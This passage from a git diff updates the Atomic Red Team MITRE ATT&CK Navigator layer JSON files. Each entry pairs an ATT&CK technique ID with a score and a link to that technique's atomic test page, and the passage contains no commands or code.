Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 5d88d116..0cc7caf4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View 
